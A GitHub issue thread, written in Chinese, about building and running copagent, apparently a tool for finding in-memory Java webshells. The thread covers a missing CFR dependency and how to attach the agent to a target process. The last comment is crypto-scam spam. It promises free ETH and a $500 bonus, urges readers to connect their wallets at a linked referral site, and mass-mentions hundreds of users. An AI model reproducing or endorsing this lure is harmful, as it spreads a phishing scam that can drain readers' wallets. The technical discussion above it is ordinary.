### ISSUE TITLE
项目代码少类

### ISSUE THREAD

**Issue by zengxiangjiang** [LandGrey/copagent#4]
您好，把项目下载下来对应的org.benf.*类找不到，一直编译报错。

**Comment by LandGrey** [comment]
对应 [https://github.com/LandGrey/copagent/blob/master/agent/pom.xml](https://github.com/LandGrey/copagent/blob/master/agent/pom.xml) 文件中的依赖：

```
<dependency>
    <groupId>org.benf</groupId>
    <artifactId>cfr</artifactId>
    <version>0.150</version>
</dependency>
```

可以尝试把你 maven 的仓库地址设置成阿里云的，然后编译试试。

**Comment by LandGrey** [comment]
> 您好，把项目下载下来对应的org.benf.*类找不到，一直编译报错。

对应 [https://github.com/LandGrey/copagent/blob/master/agent/pom.xml](https://github.com/LandGrey/copagent/blob/master/agent/pom.xml) 文件中的依赖：

```
<dependency>
    <groupId>org.benf</groupId>
    <artifactId>cfr</artifactId>
    <version>0.150</version>
</dependency>
```

可以尝试把你 maven 的仓库地址设置成阿里云的，然后编译试试。

**Comment by zengxiangjiang** [comment]
非常感谢。
我还要一个疑问，启动是用java -Xbootclasspath/a:cop.jar -jar cop.jar  14780 agent.jar 吗？ 这样启动获取PathUtils.getCurrentJarPath(PathUtils.java:13) 报空指针

**Comment by LandGrey** [comment]
> 非常感谢。
> 我还要一个疑问，启动是用java -Xbootclasspath/a:cop.jar -jar cop.jar 14780 agent.jar 吗？ 这样启动获取PathUtils.getCurrentJarPath(PathUtils.java:13) 报空指针

直接运行命令：
```
java -jar cop.jar
```
就行，会有提示

**Comment by zengxiangjiang** [comment]
> > 非常感谢。
> > 我还要一个疑问，启动是用java -Xbootclasspath/a:cop.jar -jar cop.jar 14780 agent.jar 吗？ 这样启动获取PathUtils.getCurrentJarPath(PathUtils.java:13) 报空指针
> 
> 直接运行命令：
> 
> ```
> java -jar cop.jar
> ```
> 
> 就行，会有提示

我这边是想直接attach到目标进程。 刚刚attach成功了，但是agent.jar那边，好像没反应，没有对应的日志文件创建和输出。 
java -Xbootclasspath/a:/usr/local/jdk/lib/tools.jar -jar cop.jar 14988 agent.jar code.landgrey.copagent.Agent
执行日志：
[INFO] Try to attach process 14988, please wait a moment ...
[INFO] Attach process 14988 finished .
[INFO] Result store in : /sdyunlei/apps/apache-tomcat-8.5.57/tomcatcloudwaf/bak/.copagent/result.txt

**Comment by zengxiangjiang** [comment]
> > > 非常感谢。
> > > 我还要一个疑问，启动是用java -Xbootclasspath/a:cop.jar -jar cop.jar 14780 agent.jar 吗？ 这样启动获取PathUtils.getCurrentJarPath(PathUtils.java:13) 报空指针
> > 
> > 
> > 直接运行命令：
> > ```
> > java -jar cop.jar
> > ```
> > 
> > 
> > 就行，会有提示
> 
> 我这边是想直接attach到目标进程。 刚刚attach成功了，但是agent.jar那边，好像没反应，没有对应的日志文件创建和输出。
> java -Xbootclasspath/a:/usr/local/jdk/lib/tools.jar -jar cop.jar 14988 agent.jar code.landgrey.copagent.Agent
> 执行日志：
> [INFO] Try to attach process 14988, please wait a moment ...
> [INFO] Attach process 14988 finished .
> [INFO] Result store in : /sdyunlei/apps/apache-tomcat-8.5.57/tomcatcloudwaf/bak/.copagent/result.txt

好像可以了，麻烦您了。刚刚接触“内存马”。

**Comment by Kai5174** [comment]
> > > > 非常感谢。
> > > > 我还要一个疑问，启动是用java -Xbootclasspath/a:cop.jar -jar cop.jar 14780 agent.jar 吗？ 这样启动获取PathUtils.getCurrentJarPath(PathUtils.java:13) 报空指针
> > > 
> > > 
> > > 直接运行命令：
> > > ```
> > > java -jar cop.jar
> > > ```
> > > 
> > > 
> > > 就行，会有提示
> > 
> > 
> > 我这边是想直接attach到目标进程。 刚刚attach成功了，但是agent.jar那边，好像没反应，没有对应的日志文件创建和输出。
> > java -Xbootclasspath/a:/usr/local/jdk/lib/tools.jar -jar cop.jar 14988 agent.jar code.landgrey.copagent.Agent
> > 执行日志：
> > [INFO] Try to attach process 14988, please wait a moment ...
> > [INFO] Attach process 14988 finished .
> > [INFO] Result store in : /sdyunlei/apps/apache-tomcat-8.5.57/tomcatcloudwaf/bak/.copagent/result.txt
> 
> 好像可以了，麻烦您了。刚刚接触“内存马”。

hello，我也遇到attach finished之后没有日志文件的问题，您是怎么解决的？

**Comment by zengxiangjiang** [comment]
把错误发出来瞧瞧


 
---原始邮件---
发件人: ***@***.***&gt;
发送时间: 2021年4月15日 15:34:05
收件人: ***@***.***&gt;;
抄送: ***@***.******@***.***&gt;;
主题: Re: [LandGrey/copagent] 项目代码少类 (#4)




     
非常感谢。
 我还要一个疑问，启动是用java -Xbootclasspath/a:cop.jar -jar cop.jar 14780 agent.jar 吗？ 这样启动获取PathUtils.getCurrentJarPath(PathUtils.java:13) 报空指针
  
直接运行命令：
 java -jar cop.jar  
就行，会有提示
  
我这边是想直接attach到目标进程。 刚刚attach成功了，但是agent.jar那边，好像没反应，没有对应的日志文件创建和输出。
 java -Xbootclasspath/a:/usr/local/jdk/lib/tools.jar -jar cop.jar 14988 agent.jar code.landgrey.copagent.Agent
 执行日志：
 [INFO] Try to attach process 14988, please wait a moment ...
 [INFO] Attach process 14988 finished .
 [INFO] Result store in : /sdyunlei/apps/apache-tomcat-8.5.57/tomcatcloudwaf/bak/.copagent/result.txt
  
好像可以了，麻烦您了。刚刚接触“内存马”。
  
hello，我也遇到attach finished之后没有日志文件的问题，您是怎么解决的？

**Comment by TinTinWinata** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
edamigod, @dOrgJelli, @Hudie, @catsmells, @Web3deeper, @unenunciate, @0xSeanG, @srw, @0x7An, @feronera, @0fprod, @CptnDuras, @erkmos, @niluke, @samyk, @NickNick-Thanking, @HarryR, @orpheuslummis, @recmo, @muggin, @dzmitry-lahoda, @Snowpine, @fernantho, @snario, @Franck-Fernandez-pro, @Sprimage, @terry2012, @docaquatic, @jpantunes, @int3hh, @mcgingras, @6c737133, @Dreamerryao, @blumojo, @luciancorlan, @iogakos, @0xRake, @damn1, @nikita, @0xNazgul, @sprtd, @AlexiaChen, @elizabethdinella, @vishnummv, @bhattisatish, @oraluben, @0x13LIN, @singulart, @alegrimaldi20, @xrkklizalevochka, @justmert, @neomafo88, @rauljordan, @NamesBidwellSir, @repo-gardener, @MartinMaritim, @gokulsan, @islishude, @ahmethedev, @0x6368616e67, @hzysvilla, @mo-xiaoxi, @Rocketjm, @mwielgoszewski, @JaniAnttonen, @david30907d, @D5715, @AlphaPlant, @mojtaba-eshghie, @ninjaahhh, @maxschnaider, @BunsDev, @lamengao, @SamGMK, @dogatkeyboard, @luloxi, @jordipainan, @Und3rf10w, @GiorgioDalla, @MechanisM, @ivanzhelyazkov, @zakrad, @DCodeAus, @HilliamT, @vmed, @0xNikolas, @darkslategrey, @mrexodia, @0xTenzo, @yxliang01, @esneko, @ihacku, @fhouser, @ian0371, @liyansong2018, @luduvigo, @Cygnusfear, @avishkarabhishek786, @0xz4ro0xsaya, @Funarp, @xjjda22, @laurikjk, @vividgithub, @ashessqy126, @stjordanis, @antoniotrento, @fr0zenrain, @amlcodes, @deniztoprak, @stypr, @red-swan, @ARnowsoe, @SergioMazariego, @Jimmystario, @itsjoeyrighthere, @opeseyi, @JosepBove, @postmeback, @dranov, @ith-harvey, @dstrbad, @kenchangh, @gitpva, @mickyngub, @mempirate, @gskapka, @thoo-ma, @lotz84, @hasselalcala, @arianon, @sunlidong, @crazy-abc, @JesseAbram, @MicrochipQ, @helperShang, @canonbrother, @Ranhiru, @Limitinit, @0xBeshoy, @cheekybastard, @agbanusi, @c0wjay, @cocodigrande2021, @zayneio, @daocore, @Cab789, @mutalisk999, @andrejrakicronhuafeng, @rarecoil, @lambdamonkey, @maciejhirsz, @andywer, @peterdouglas, @Dziubutkus, @testanib, @BigVeezus, @nikitavoloboev, @coutureb, @viper7882, @nickbytes, @renatahodovan, @zdrift3r, @frankhu1089, @Kaiziron, @xhitz, @chillersky, @iRhonin, @BaaBaaGoat, @geeknees, @ZigBalthazar, @mubaris, @elkorba, @ith-harvey, @superuser5, @MarkLee131, @nickdoherty, @notbdu, @abhilov23, @nganhkhoa, @amcolex, @0xjim, @rivit98, @DoubleMice, @Th3Sc4v3ng3r, @markosneiders, @Chirag21, @Butters3388214, @fengkiej, @0xBigBoss, @earnmax, @PatrickAlphaC, @n0b0dyCN, @rahulnm, @192-sean, @syang-ng, @MdTeach, @pventuzelo
